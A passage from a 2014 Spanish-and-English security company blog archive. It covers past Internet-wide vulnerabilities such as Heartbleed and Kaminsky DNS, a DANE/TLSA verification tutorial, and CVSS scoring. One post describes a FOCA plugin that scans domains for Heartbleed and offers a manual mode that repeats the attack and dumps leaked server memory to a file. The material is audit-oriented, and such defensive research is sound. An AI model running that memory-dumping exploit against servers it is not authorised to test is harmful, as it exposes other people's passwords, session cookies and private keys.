de las "FakeApps" y el malware en Google Play (II): Tipos de "fakes" * El negocio de las "FakeApps" y el malware en Google Play (III): Estrategias * El negocio de las "FakeApps" y el malware en Google Play (IV): Política y rentabilidad * El negocio de las "FakeApps" y el malware en Google Play (V): Limpieza automática * El negocio de las "FakeApps" y el malware en Google Play (VI): Limpieza "manual" * El negocio de las "FakeApps" y el malware en Google Play (VII): Cómo llegan a las víctimas * El negocio de las "FakeApps" y el malware en Google Play (VIII): Permisos en las apps * El negocio de las "FakeApps" y el malware en Google Play (IX): ¿Qué hacen y cómo se programan las apps? Sergio de los Santos ssantos@11paths.com @ssantosv
7 de mayo de 2014
Internet se ha roto, otra vez (y II )
Poco se puede aportar ya al fallo de implementación criptográfica Heartbleed (en Eleven Paths ya tenemos disponibles plugins para FOCA y Faast). Se trata de un grave problema que tendrá (y es posible que haya tenido) graves repercusiones. Sin embargo, no es la primera catástrofe (criptográfica o no) en la red. ¿Las ha habido peores? ¿Es realmente una catástrofe, o lo han sido sus "daños colaterales"? Otros apocalipsis En general, ya se han dado casos muy similares de catástrofes que afectarían a la red tal y como la conocemos, y de la que se han desprendido titulares dantescos. El primero fue el "efecto 2000", que aunque no contó con logotipo oficial desde el principio, sí que disfrutó de una marca propia (Y2K)... pero eran otros tiempos, no era propiamente criptográfico y quedó en una especie de decepción apocalíptica que se sació con mucha literatura y algunos telefilms. Pero recientemente ya hemos sufrido varias veces "el peor fallo de la historia de Internet". Veamos algunos: El apocalipsis criptográfico de Debian. 2008. Se descubre que alguien (por error) del equipo de Debian eliminó en 2006 una línea de código en el paquete OpenSSL de Debian que ayudaba a generar la entropía al calcular el par de claves pública y privada. Esto hace que las claves generadas con él ya no sean realmente fiables o verdaderamente seguras. Se podía consultar en una tabla sus privadas correspondientes, conociendo las públicas. Miles de millones de claves, que no sabía muy bien qué protegían, eran ya una completa pantomima. Ninguna CA pareció verse afectada. Kaminsky y los DNS: Julio de 2008. Se publica una actualización coordinada para la mayoría de los dispositivos en Internet que utilizan DNS. Un fallo incluso más grave que los mencionados, porque era inherente al protocolo, no un problema de implementación. Dan Kaminsky lo descubre sin ofrecer detalles, pero algún dato se escapa. Thomas Dullien se aventura semanas después a publicar en su blog su particular visión de lo que podía ser el problema descubierto por Kaminsky, sin tener conocimiento previo de los detalles. Y no se equivoca en su teoría: era posible falsificar (a través del envío continuo de cierto tráfico) las respuestas de los servidores autorizados de un dominio. Esto era también gravísimo, pero la actuación fue correcta y coordinada. Aun con Dullien publicando antes de tiempo el fallo, "sin querer". ¿Se usó antes por atacantes? Nunca se supo. Eso sí, años después, incluso después de esa catástrofe, DNSSEC sigue siendo "una rareza". Espionaje a "gran escala" con BGP: En agosto también de 2008, se habla de nuevo de la mayor vulnerabilidad conocida en Internet. Tony Kapela y Alex Pilosov demostraron una nueva técnica (que se creía teórica) que permite interceptar el tráfico de Internet a una escala global. Se trataba de un fallo de diseño en el protocolo BGP (Border Gateway Protocol) que permitiría interceptar e incluso modificar todo el tráfico de Internet no cifrado. BGP es un protocolo que se utiliza para intercambiar tablas de enrutamiento entre sistemas autónomos (AS). El problema es que nunca se ha llegado a idear un sistema que realmente autentique a ambas partes, y los routers estén así seguros de que la información recibida desde un AS es legítima y viene del sitio adecuado. Ese mismo año, se habló de la denegación de servicio "perfecta". La compañía sueca Outpost24 afirmó haber descubierto en el 2005 (aunque lo sacó a la luz en 2008) varias vulnerabilidades de base en el mismísimo protocolo TCP/IP que podrían permitir la caída de cualquier aparato con comunicación TCP en la red. Fue llamada "denegación de servicio de bajo ancho de banda". Decían no conocer una implementación de la pila que no fuese vulnerable. Aunque grave, se olvidó rápidamente y causó menos revuelo del esperado. Página de heartbleed animando a utilizar el logotipo para ilustrar la noticia El apocalipsis también hay que saber "venderlo" Si nos distanciamos del aspecto técnico, lo que diferencia a Heartbleed con respecto a las ya mencionadas, es sin duda su perfecta campaña de marketing y difusión. Si el fallo en los DNS descubierto por Kaminsky era eso, "el fallo de Kamisnky", este ha contado por primera vez con un logotipo para anunciar una vulnerabilidad; se le ha dotado de un nombre muy adecuado e ingenioso; se ha reservado un dominio; orquestado una especie de campaña de comunicación; cuidado al detalle el diseño de la página; difundido notas de prensa con alto alcance que ha llegado a los telediarios; se han colado ligeras exageraciones para dar empaque (el 66% de Internet era vulnerable...); incluso se ha cuidado el "timing" (se alimentan teorías sobre si el día de la muerte de XP era o no adecuado para difundirlo)... en definitiva, una especie de espectáculo a gran escala perfectamente acompasado para dar a conocer un grave fallo de seguridad. Un paso que no se había dado hasta ahora al menos de forma tan consciente, incluso cuando se han descubierto problemas de seguridad a la altura. Esto tendrá una consecuencia directa: Las vulnerabilidades graves (no descubiertas como 0day) siempre han servido para dar a conocer a su autor, elevar su prestigio personal o de su empresa. Heartbleed (al margen de merecer la importancia técnicamente) les ha enseñado a todos que se puede hacer "mejor". De hecho, ya se han lanzado vulnerabilidades con un diseño similar: http://tetraph.com/covert_redirect/ Los fallos con perspectiva ¿Consecuencias de todo esto? Hasta el momento parece que nunca se han utilizado ninguna de estas vulnerabilidades como métodos de ataque masivo que colapsen Internet y "la rompan". ¿Han servido estas grandes catástrofes para poner contra las cuerdas a la Red? Tampoco. ¿Alguien se ha beneficiado de ellas? Seguro. Para poner de rodillas a la red, en realidad, se usan otras armas: malware común y sencillo, realizado por atacantes menos sofisticados, como Blaster, Sasser, CodeRed o Slammer (todos con más de 10 años), sí que consiguieron un impacto masivo en la Red. Incluso ciertos ataque DoS, en especial los realizados contra servidores DNS centrales usando simplemente la fuerza bruta, tuvieron más impacto "real" (y menos mediático) desestabilizando Internet. Quizás podría ser comparado a las catástrofes aéreas en contraste con los accidentes de tráfico. Una catástrofe aérea es, en un instante, un verdadero drama para cientos de pasajeros. El accidente aparecerá en los telediarios, se investigará y será recordado. Afortunadamente, ocurren ocasionalmente. Sin embargo, el problema con las muertes de tráfico en carretera, proporcionalmente, parece mucho mayor. Ocurren a diario, no aparecen en las noticias, y se dice que estadísticamente resulta mucho más inseguro viajar por carretera en turismo que tomar un avión. Sin embargo, ese goteo de víctimas en las autovías y carreteras secundarias, causa un daño mayor en conjunto, más "palpable". * Internet se ha roto, otra vez (I) Sergio de los Santos ssantos@11paths.com @ssantosv
5 de mayo de 2014
Internet se ha roto, otra vez (I)
Poco se puede aportar ya al fallo de implementación criptográfica Heartbleed (ya tenemos disponibles plugins para FOCA y Faast). Se trata de un grave problema que tendrá (y es posible que haya tenido) graves repercusiones. Sin embargo, no es la primera catástrofe (criptográfica o no) en la red. ¿Las ha habido peores? ¿Es realmente una catástrofe, o lo han sido sus "daños colaterales"? La mejor explicación de Heartbleed. Fuente: http://xkcd.com/1354/ En la versión OpenSSL 1.0.1 se introdujo la implementación del protocolo RFC6520, que describe la extensión hearbeat en TLS/DTLS. Al introducir esta extensión, se pretendían evitar constantes renegociaciones. Servidor y clientes se enviaban "latidos" para mantenerse "informados". OpenSSL lo implementó mal, con desastrosas consecuencias. En la práctica, basta realizar ciertas peticiones a un servidor que trabaje con la versión vulnerable de OpenSSL, para que devuelva un buen trozo de información (64ks, un "heartbeat") que, literalmente, puede contener cualquier cosa: desde cookies de sesión de usuarios conectados en ese momento, pasando por contraseñas, o incluso la propia clave privada del servidor. Esto quedó demostrado con el reto de Claudfare, que solventó finalmente Indutny en cuestión de horas gracias a esta herramienta que programó él mismo. Pero de esto ya se ha hablado mucho. Lo verdaderamente curioso son los efectos colaterales, tanto de la vulnerabilidad, como de las reacciones en la comunidad. ¿Cuáles son los escenarios y probabilidades de ser vulnerable? Para conocer el verdadero impacto podemos hablar de los diferentes escenarios, más o menos catastróficos, que se pueden presentar. Muchas formas de ser vulnerable Un usuario puede verse afectado porque un atacante haya "consultado" el servidor y, casualmente o no, haya dado en un trozo de memoria con la contraseña o cookie de ese usuario. Tanto por cookie como por contraseña, la cuenta está comprometida. Es poco probable que atacantes hubieran realizado esto de forma masiva antes del día de la revelación, pero sí es muy posible que, pocas horas después, se dedicaran a atacar servidores todavía vulnerables de forma masiva. De hecho se ha confirmado para la Canada Revenue Agency. Un usuario puede verse afectado porque hayan robado la clave privada de un servidor. En este escenario, se dan varios subcasos, porque el atacante ha podido conseguir varias cosas: Si el servidor no usaba perfect forward secrecy (e incluso si se usaba, pero con menor probabilidad), y además el atacante obtuvo previamente (con ataques MiTM) tráfico cifrado... estas conversaciones pueden ser ahora descifradas ahora con la clave. Un descifrado con efectos retroactivos. Si se obtuvo la clave privada, es posible suplantar criptográficamente al servidor (siempre que se redirija al usuario a ese servidor sin que lo note). O sea, el phishing perfecto. El servidor atacado debe no solo regenerar, sino revocar las anteriores claves y certificarlas de nuevo (las CA están frotándose las manos) OpenSSL se encuentra en muchos entornos, protocolos y dispositivos. VPNs, routers... incluso en entornos que son difíciles de actualizar. ¿Qué ocurrirá con ellos y sus usuarios? Quizás no se les ha prestado tanta atención. Los clientes también pueden ser vulnerables. Usuarios de wget o curl que enlacen a una librería OpenSSL vulnerable y se conecten a servidores maliciosos, podrían estar ofreciendo trozos de memoria a un tercero. Estos son los escenarios, por lo que es poco probable que algún usuario de internet se libre del problema. Pero, entonces ¿es una catástrofe, o no? Depende de si esto estaba siendo usado con anterioridad. Si no es así, la revelación y parcheo ha sido rápida, y la campaña de comunicación perfecta para que se entere hasta el último usuario de la red. El ruido ha sido mucho, pero se habría manejado razonablemente bien la situación. Si realmente alguien usó esto de forma masiva (cosa que nunca se podrá saber a ciencia cierta, aunque la Casa Blanca lo niegue explícitamente), el problema es un poco más grave (aunque no sabemos si más o menos grave que cualquier sistema de espionaje al que ya parece que estamos sometidos). Pero al menos, como consecuencia, una buena parte de los usuarios habrán modificado ya algunas claves, y los servidores regenerarán su material criptográfico. No está mal como sistema obligado de "limpieza" y regeneración. Los "daños colaterales" Pero lo mejor que ha conseguido Heartbleed es una sacudida de ciertos cimientos, que se pongan sobre la mesa asuntos necesarios. Algo que siempre es sano. Veamos brevemente qué ha pasado no con el terremoto en sí, sino con el tsunami que ha causado. Que se le saquen los colores a OpenSSL y se plantee la necesidad de un fork desde cero. También, que se destape la precariedad en la que trabajan ciertos programadores de software libre, y la necesidad de que usuarios y empresas de verdad inviertan en estos proyectos. Por ejemplo, Firefox ha revisado su código relacionado con la validación de certificados y premiará con 10000 dólares a quien encuentre un fallo. Que se debata otra vez sobre la poca utilidad real de la mayoría de métodos tradicionales de revocación de certificados. Bien porque hay navegadores que ya no usan una u otra técnica, bien porque no la soportan las CAs o los servidores, realmente el sistema de revocación necesita una revisión urgente. Lo mejor que se conoce ahora es el OSCP Staple obligatorio, pero no es muy usado. Crecimiento en los últimos años de los CRL (Certificate revocation lists) algo que no se puede mantener. El pico en 2014 no es un error. Fuente: https://isc.sans.edu/forums/diary/Heartbleed+CRL+Activity+Spike+Found/17977 Aunque es cierto es que pocas veces fue tan sencillo lanzar un exploit para causar tanto daño en tantos sitios, veremos en la siguiente entrega que en realidad, Internet ya se ha roto muchas veces. * Internet se ha roto, otra vez (y II) Sergio de los Santos ssantos@11paths.com @ssantosv
2 de mayo de 2014
Heartbleed plugin for FOCA
By now, everyone knows about Heartbleed. Just like we did for FaasT, we have created a plugin for FOCA (final version) one of our most downloaded tools. This plugin allows the tool to detect vulnerable servers and audit them, among all the other cool features FOCA counts with. Loading the plugin in FOCA To take advantage of the plugin, just download FOCA and create a project over the domain to be audited. Load the plugin from "Plugins" tab in the upper menu, and press on "Load/Unload plugins". Browse for HeartBreatPlugin.dll and load it. Once loaded, it will be accessible from the plugins menu. There are two options: automatic analysis or manual analysis and exploitation. Checking on "Check all hosts that FOCA detects automatically for the HeartBleed vulnerability" will make FOCA to check for the vulnerability in all domains found for this project. Automatically checking domains Domains will go from the "Pending" box to "Checked" or "Vulnerable", depending on the results. All domains found by the usual way FOCA works, will be checked. For a manual analysis, a domain and port has to be specified. There is an option to repeat the attack every 5 seconds and generate a memory dump, that will be stored in a local file. Manually checking domains Ricardo Martín ricardo.martin@11paths.com
30 de abril de 2014
DANE: una opción para mejorar el escenario de TLS (y sin hablar de HeartBleed)
Después de la resaca de HeartBleed, ha existido una especie de "caza de brujas" buscando otros servicios (aparte de HTTPS) que pudieran estar comprometidos: servidores de correo, de IMAP, OpenVPN, entornos industriales, dispositivos embebidos, etc. Casi nadie se ha librado debido al uso masivo de OpenSSL. Una de las pocas aplicaciones que usa OpenSSL pero no está afectada (porque no usa la extensión Heartbeat) es DNSSEC, la eterna promesa del DNS. Sin embargo, sí que existe una iniciativa basada en DNSSEC que de alguna manera está afectada por HeartBleed: DANE. Introducción DANE (siglas de DNS-Based Authentication of Named Entities), especificado en el RFC 6698, es una propuesta de intentar mejorar el escenario actual de uso de TLS y las autoridades certificadoras (CAs). Hoy en día utilizamos certificados para poder relacionar una clave con un nombre concreto (un dominio, un email, etc.), y este certificado combina la clave pública con otra información relevante para el uso de este certificado. Finalmente es firmado por otra clave (generalmente de una CA o subCA). La firma de este certificado sólo tiene sentido si confiamos en la clave que lo ha firmado, y esa es la razón por la que debemos confiar en una serie de CAs que mantenemos instaladas en nuestro sistema operativo o navegador. De hecho, cuando hablamos del pinning de certificados ya se mencionó a DANE como alternativa, apuntando a los problemas que existen hoy en día con el modelo tradicional de las Certification Authorities (CA): hay una gran cantidad, nuestros sistemas operativos y navegadores confían por defecto en muchas de ellas y por desgracia algunas son comprometidas... además del modelo de negocio que existe detrás. Lógicamente, estas autoridades deben proteger con especial ahínco su clave privada puesto que el que la obtenga puede firmar certificados sin ningún tipo de control. Además de que generalmente no se comprueba si un certificado está firmado por una determinada CA o no (solo que esté firmado), lo que deriva en un gran problema en el caso de que una CA sea comprometida. Por otro lado, las DNS Security Extensions (DNSSEC) son un modelo similar a las CAs donde claves en las que se confían firman digitalmente información de claves no confiables. Esto significa que para un dominio como www.elevenpaths.com, cada organización de la cadena de estructura DNS debe firmar la clave de la organización inmediatamente inferior. Por ejemplo, .com firma la clave de elevenpaths.com y los dominios raíz firman la clave de .com. Durante la validación, DNSSEC sigue esta cadena de confianza hasta la raíz automáticamente, tal y como ocurre con una validación "normal" de SSL/TLS, y donde los dominios raíz funcionan como CAs. Aunque DNSSEC ofrece varias mejoras: las claves están asociadas a nombres DNS, se pueden acceder a las claves firmadas con una simple petición DNSSEC, y lo más importante: que las claves de un dominio en concreto sólo pueden ser firmadas por las claves del dominio padre, y no por otros, como ocurre en el SSL "habitual" que varias CAs pueden firmar un mismo dominio. DANE combina estos conceptos y aprovecha la infraestructura DNSSEC para almacenar y firmar las claves y certificados que se usan en cualquier servicio TLS. Cómo funciona DANE Su funcionamiento es muy sencillo. Cuando nos conectamos a cualquier servicio TLS, lo que hacemos es: Por un lado, obtener la información del certificado que nos ofrece ese servicio (este es comportamiento normal) Pero a la vez, se hace una petición DNS para ver si concuerda con un registro especial DNSSEC (tipo 52 o TLSA) donde se almacena la información de ese certificado. Si coincide, es que todo está bien. Es decir, que para que el sistema funcione, sólo se tiene que modificar el registro DNS del dominio, añadiendo un campo. Registro DNSSEC El formato del registro DNSSEC donde se indica la información de DANE se divide en cuatro campos principales (y sus posibles valores): Uso del certificado: (0) CA Constraint, donde indicamos la CA autorizada a firmar el certificado, (1) Service Certificate Constraint donde indicamos un certificado que ser igual que en el servicio TLS, (2) Trust anchor assertion donde podemos indicar que CA vamos a usar y (3) Domain-issued certificate donde podemos indicar un certificado que será el válido (puede incluso ser uno auto-firmado) Selector: la parte del certificado que se usará para comprobar con la información en el registro: (0) Todo el certificado, (1) sólo la clave pública Tipo de comprobación: (0) exacta, (1) hash sha256, (2) hash sha512 Los datos concretos: generalmente el hash o bien del certificado o de la clave pública que se quieren comprobar. El nombre del registro DNS tiene que ser de la forma _puerto._protocolo.dominio. Por ejemplo _443._tcp.torproject.org o _25._tcp.mail.ejemplo.com son nombres de registro válidos. Ejemplo En la página del proyecto TOR (que soporta DANE), se puede ver su registro relacionado con la página web del proyecto (para ello se solicita el registro TLSA que son el tipo 52 con este comando): host -t TLSA _443._tcp.torproject.org que devolverá: _443._tcp.torproject.org has TLSA record 3 1 1 578582E6B4569A4627AEF5DFE876EEC0539388E605DB170217838B10 D2A58DA5 donde se puede comprobar que torproject.org en el puerto 443/tcp tiene un servicio TLS donde existe un certificado cuyo hash256 (el tercer 1) de su clave pública (el segundo 1) es 578582E6B4569A4627AEF5DFE876EEC0539388E605DB170217838B10 Para comprobar que coincide con el certificado que nos envía el servidor al acceder a la página web por HTTPS, se debe primero obtener su clave pública y calcular su hash. Se obtiene el certificado de la web de torproject.org con el siguiente comando: openssl s_client -connect torproject.org:443 ** snip ** -----BEGIN CERTIFICATE----- MIIFXTCCBEWgAwIBAgIQCUixqTslHQ2xBRBZ4sJoCjANBgkqhkiG9w0BAQsFADBwMQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3dXJhbmNlIFNlcnZlciBDQTAeFw0xMzEwMjIxMjAwMDFaFw0xNjA1MDMxMjAwMDBad3cuZGlnaWNlcnQuY29tMS8wLQYDVQQDEyZEaWdpQ2VydCBTSEEyIEhpZ2ggQXNzMHIxCzAJBgNVBAYTAlVTMRYwFAYDVQQIEw1NYXNzYWNodXNldHRzMRAwDgYDVQQHAoIBAQC3IzntyGiFJ+WBDpwADPriJSptB8h1Gkeq8FNJuWIXUlfA0RlAfNEOu85CEwdXYWxwb2xlMR4wHAYDVQQKExVUaGUgVG9yIFByb2plY3QsIEluYy4xGTAXBgNVBAMMECoudG9ycHJvamVjdC5vcmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKG7rUzGxJWvCqT0qrCvxUoUl4S1geh7+VFdo0evz88YvEGizDALi0+aBwpEeiZyxWqFhHheih24hWS1Uf6bh+uHG8kRfHAgMBAAGjggHvMIIB6zAfBgNVHSMEGDAWgBRRa1LT6udEZoWH4NeZMKLJhMz6i2tzQ3CubaU1+RePA7wU/tGgmUC53Shs1YYiSKRCXX03OvW9YuMRsoc6eAoVBQ7ZivTEWRUbwxZeGWlQXtoWsP/tZHphsIeVLmg/jw6kyZfscEHVAqylgYMJzlSySqq6dv2HNJpJExV6nVA9QUvsILwg4uuH+53csk0IG/CFaP+QrwIHdTzM2WVkYqISuFlyOzAdBgNVHQ4EFgQUgiYI8RMpVTQUtI+AHXG4YNpLc2hhMi1oYS1zZXJ2ZXItZzEuY3JsMEIGA1UdIAQ7MDkwNwYJYIZIAYb9bAEBMCowQcwwKwYDVR0RBCQwIoIQKi50b3Jwcm9qZWN0Lm9yZ4IOdG9ycHJvamVjdC5vcmcwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjB1BgNVHR8EbjBsMDSgMqAwhi5odHRwOi8vY3JsMy5kaWdpY2VydC5jb20vc2hhMi1oYS1zZXJ2ZXItZzEuY3JsMDSgMqAwhi5odHRwOi8vY3JsNC5kaWdpY2VydC5jb20vKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LmRpZ2ljZXJ0LmNvbS9DUFMwgYMGCCsGUKvNlZ9ZI0C0b1vbsl6L6Mtb0GA15ejF5/BT6Q38sN84PmeWp5nbYJ0ZAKsrky/cAQUFBwEBBHcwdTAkBggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tME0GCCsGAQUFBzAChkFodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRTSEEySGlnaEFzc3VyYW5jZVNlcnZlckNBLmNydDAMBgNVHRMBAf8EAjAAMA0GCSqGSIb3DQEBCwUAA4IBAQBvcHF+gBHQqmAJYTrpqUtCNI+rdGPQ1otYgx4E16qZhd9kUgwug9c+ygo9LsRqap9aBMSOKYKc5MbHX1a9qkEYFOwlDN24IyClAV+MPkCVTOS/XxK3E7FmHsr6i/OHiGhK1eWbHKPAd6pTg7TT3VDlqyss8E+t7dckuArEekVjmy8opy75N4xkzEhuRMdPq722uOnHsYxXvPOA96RKufTkFwJje/xVm/g7vlN23IEBeKm7UOp6ksIRGTo6b+yYr2fzVOVxpXnMNkbJ7WNS/ZtS -----END CERTIFICATE----- ** snip ** Se almacena el certificado (incluyendo el BEGIN y el END CERTIFICATE) en un fichero. Por ejemplo cert.crt Se extrae la clave pública del certificado (porque como hemos visto en el registro DNSSEC, hacen el hash256 de la clave pública) openssl x509 -pubkey -noout -in cert.crt > pubkey.pem Se calcula su hash sha256 (código rápido en python basado de las dnssec-tls-tools de Adam Langley) import sys
import hashlib
def main(args):
if len(args) != 2:
print 'usage: %s ' % args[0]
return
base64_data = ''
in_base64_data = False
for line in [x[:-1] for x in file(args[1], 'r').readlines()]:
if in_base64_data:
if line == '-----END PUBLIC KEY-----':
break
base64_data += line
elif line == '-----BEGIN PUBLIC KEY-----':
in_base64_data = True
spki = base64_data.decode('base64')
tlsa = hashlib.sha256(spki).digest()
print 'Hash256 is %s' % (tlsa.encode('hex'))
if __name__ == '__main__':
main(sys.argv)
Y finalmente se comprueba que sean iguales hash256.py pubkey.pem Hash256 is 578582e6b4569a4627aef5dfe876eec0539388e605db170217838b10d2a58da5 que efectivamente coincide con el hash previamente calculado. Se puede comprobar además que los datos del registro DNS están firmados de forma correcta. El comando: dig +nocomments +nostats +nocmd +noquestion -t dnskey . > trusted-key.key almacenará la clave de la raíz. Luego, el comando dig +topdown +sigchase +multiline -ta www.torproject.org devolverá si la operación de comprobación de todas las cadenas ha tenido éxito o no. Ejemplo de comprobación con www.torproject.com, y el comando usado ¿Qué aporta DANE? DANE proporciona algunas ventajas a la hora de lidiar con TLS: Es posible limitar por CA, es decir, que es posible especificar que sólo una CA concreta puede firmar los certificados de un servidor (lo que disminuye la probabilidad de que alguien lo suplante si se compromete la seguridad de una CA concreta). Por ejemplo, en el caso del incidente de DigiNotar se crearon certificados falsos de Gmail; si Google hubiera usado DANE y hubiera limitado que sus certificados sólo pueden ser firmados por la CA que utiliza (GeoTrust), este ataque no hubiera funcionado para los clientes que visitaran el sitio falso. Permite definir libremente qué CA se quiere usar para un certificado (y puede ser una CA propia). Permite utilizar un certificado auto-firmado. Según el observatorio de SSL de la EFF, un 46% de los certificados en Internet son auto-firmados. Problemas DANE no aporta la validación extendida que ofrecen las CAs, donde se comprueba realmente la organización detrás de un certificado. Es algo que todavía hoy tiene que ser un procedimiento manual. Se trata de comprobar ciertos datos para que por ejemplo alguien que quiera un certificado goog1e.com, debademostrar que es Google Inc, "burocráticamente". Pero el principal problema es la falta de uso generalizado de DNSSEC, tanto a nivel de servidor como de los clientes. Todavía hoy incluso algunos routers en Internet bloquean las peticiones y respuestas DNSSEC por resultar paquetes demasiado grandes. Además, por compatibilidad con navegadores u otros clientes TLS antiguos se necesitan aún certificados firmados por CAs bajo algunos escenarios. Pero independientemente de la solución, lo fundamental es que sea respaldada por los navegadores. Y aún los navegadores no lo soportan. De hecho, durante un tiempo estuvo implementado en navegadores como Chromium aunque parece ser que eliminaron la funcionalidad por "poco uso"; en Firefox se discute hace años el poder incluirlo (existen parches no oficiales) aunque por ahora no está priorizado. Por suerte, existe un plugin para todos los navegadores que funciona bastante bien llamado DNSSEC TLSA Validator. Plugin DNSSEC TLS Validator para Firefox Por si fuera poco, se suma un problema al aumentar la latencia. Se añaden varias peticiones más en cada conexión TLS, con lo que se agrega un retardo que puede llegar a ser significativo en protocolos que requieren inmediatez como SIP, XMPP, etc. Existe una opción para evitarlo y es que, por ejemplo, se almacenen datos del registro DNSSEC serializado en el propio certificado (esta es la opción que eligió Chromium en su implementación), pero a su vez tiene problemas relacionados con el corto tiempo de vida de las firmas de DNSSEC... lo que obligaría a su vez a renovar los certificados TLS de forma casi constante. Todo esto es lo que ha llevado a que, a día de hoy, de los 10.000 "top domains" de Alexa, tan sólo 3 de ellos mantengan DANE habilitado: torproject.org, fedoraproject.org y freebsd.org. Otros usos DANE ya se puede utilizar en BIND desde la versión 9.9.1-P3 de diciembre 2012, y también está presente en servidores SMTP como Postfix, clientes de IRC, servidores de XMPP, SIP, etc. También existen ideas para poder utilizar DANE como método seguro de recuperar el certificado SMIME de un usuario, donde si por ejemplo se quiere conocer la clave pública de chris@example.com, tan sólo tendría que solicitar el registro 3f51f4663b2b798560c5b9e16d6069a28727f62518c3a1b33f7f5214._smimecert.example.com donde 3f51f4663b2b798560c5b9e16d6069a28727f62518c3a1b33f7f5214 es el sha224 de 'chris' y de esta forma obtendría la clave pública de Chris. También podría funcionar para claves OpenPGP con el formato 3f51f4663b2b798560c5b9e16d6069a28727f62518c3a1b33f7f5214._openpgp.example.com e incluso para claves públicas OTR: nb2wo2a=._otrfp.example.com. donde nb2wo2a= es el Base32 del usuario, en este caso "hugh". El futuro Si se utilizara DANE de forma masiva, el horizonte apuntaría a eliminar CAs comerciales, puesto que se podrían usar certificados sin que estas CA los firmasen. Aunque siempre quedarán las CAs que ofrecen los certificaciones extendidos, que ahora mismo son las menos. Pero por supuesto, el lobby de las CA hará todo lo posible para que iniciativas como DANE no salgan adelante, puesto que puede hacer peligrar su negocio de venta y renovación de certificados. Adicionalmente se estaría dando un rol de seguridad más importante a los administradores de DNS, puesto que serían los árbitros con el poder de decidir quién se puede autenticar bajo un nombre concreto. Su función, realmente sería parecida a las CAs actuales (lo que significa que si alguien compromete su seguridad, las consecuencias serán muy negativas). Esto podría llevar a nuevos problemas en grandes organizaciones puesto que, generalmente los equipos que gestionan el DNS son diferentes a los que gestionan los certificados. Y ante casos como HeartBleed podrían existir problemas de coordinación. David Barroso david.barroso@11paths.com @lostinsecurity
28 de abril de 2014
Eleven Path's first anniversary. Cakes and Labs
Although our first post was created in May, Eleven Paths officially started a year ago, in April 2013. It has been a whole year of hard work, but with quite a lot of rewards. Much more than we expected. Anyhow, it is just a year. To be honest, that was "easy". We still have to grow old and create the innovation technology we want to. Just a year ago, Latch was not even an idea. FaasT was a tiny little thing (right now, it's a monster), Metashield was basically a prototype... and much more (tools, conferences, white papers, patents...). But we still have new technology to show. And it's going to be great. We really think so. For this special day, we took a break in London, Madrid and Málaga Labs. We stop typing for a while and share a moment with our coworkers. These are just a few pictures of the little party we all shared. The tiny cake from London (we don't endorse Evian), The big and customized cake for Málaga, with typos included, and hiding the workers identities (you are welcome)... And from our headquarters in Madrid. As far as we can tell, they were all delicious.
25 de abril de 2014
Ocho siglas relacionadas con las vulnerabilidades (III): CVSS
Uno de los factores críticos sobre el que gira el mundo de la seguridad es el estudio y control de vulnerabilidades. Para conseguirlo de manera objetiva, existen organizaciones como MITRE, FIRST e ICASI, encargadas de parametrizar y estandarizar. Veremos qué estándares utilizan y cómo aprovecharlos para entender mejor los problemas de seguridad. Si en la entrada anterior se cubrieron los CVE, CWA y CAPE, en esta se verá el CVSS. ¿Quién y cómo se valora la gravedad de una vulnerabilidad? ¿Qué es exactamente un riesgo "alto" o una "vulnerabilidad crítica"? ¿Es cierto que según quien describa el fallo, la gravedad parecerá más o menos grave? Resulta complejo valorar el peligro de forma objetiva. Por ejemplo, el fabricante siempre tenderá a hacer hincapié en la mitigación o restarle importancia al problema en su boletín de seguridad. Otros medios, clamarán que se trata de un fallo muy grave en función del titular que necesiten. Y los usuarios verán que arbitrariamente unas vulnerabilidades son "altas" y otras "medias"... pero no saben a qué atenerse. Para solucionar esto nació CVSS (Common Vulnerability Scoring System), un sistema de valoración de vulnerabilidades creado como un método estándar para determinar y clasificar la criticidad de las vulnerabilidades. Este estándar pertenece a FIRST. Es una confederación internacional de equipos de respuesta a incidentes informáticos que gestionan problemas de seguridad y promueven programas de prevención. FIRST patrocina y apoya el CVSS-SIG, que a su vez es un grupo de profesionales de la seguridad cuyo enfoque se centra en las vulnerabilidades de seguridad y utilizan CVSS como fundamento de su trabajo diario. Este grupo se encarga de actualizar y promover el uso del CVSS y de proporcionar un repositorio central para la documentación de este sistema de valoración. Para conseguir ser lo más objetivo posible, CVSS se encarga de estudiar las diversas propiedades de una vulnerabilidad y las agrupa en tres métricas diferentes. En la actualidad y desde 2007, se utiliza la segunda versión de este sistema (CVSSv2), aunque en mayo de 2012 ya fuese aprobado el desarrollo de una nueva versión, que se espera en breve. Las tres métricas que arroja este sistema de valoración se denominan Base, Temporal y Métricas dependientes del entorno (enviromental metrics). Se encargan de estudiar la criticidad de las vulnerabilidades desde distintos puntos de vista. Base Metrics La única que es común a cualquier vulnerabilidad. Siempre se puede calcular para una vulnerabilidad y así valorarla. Su resultado es común para cualquier caso en donde se presente esta vulnerabilidad. Métricas de base. Fuente: http://www.first.org/cvss/cvss-guide A su vez, el primer factor necesario para calcular esta métrica es el que viene asociado al impacto, definido por cómo afecta la vulnerabilidad al activo en cuanto a la confidencialidad, integridad y disponibilidad se refiere, entendiéndose por cada uno de ellos lo siguiente: Confidentiality Impact: Nivel de afectación que pudiera sufrir el activo relacionado a la limitación de acceso a la información y a la comunicación para usuarios autorizados. Cuando la vulnerabilidad permite que se revele información sensible (tradicionalmente del tipo disclosure), este valor aumenta. Integrity Impact: Nivel de afectación que pudiera sufrir el activo relacionado a la fiabilidad y a la veracidad de la información. Cuando la vulnerabilidad permite corromper información sensible o modificarla, este valor aumenta. Availability Impact: Nivel de afectación que pudiera sufrir el activo relacionado a la accesibilidad de los recursos de la información. Si la vulnerabilidad permite agotar los recursos o reiniciar un servicio (cualquier tipo de DoS), este valor aumenta. Los valores que pueden tomar son "bajo", "medio" y "alto" para cada uno de ellos. El segundo de los factores es el de la explotabilidad, que viene definido por el vector de acceso, la complejidad del proceso y la autenticación necesaria para llevar a cabo un ataque que aproveche la vulnerabilidad, entendiéndose por cada una estos factores lo siguiente: Access Vector: este factor proporciona información sobre la ubicación del atacante en el instante de llevar a cabo la explotación de la vulnerabilidad. Normalmente, será remoto o local. Access Complexity: este factor hace referencia 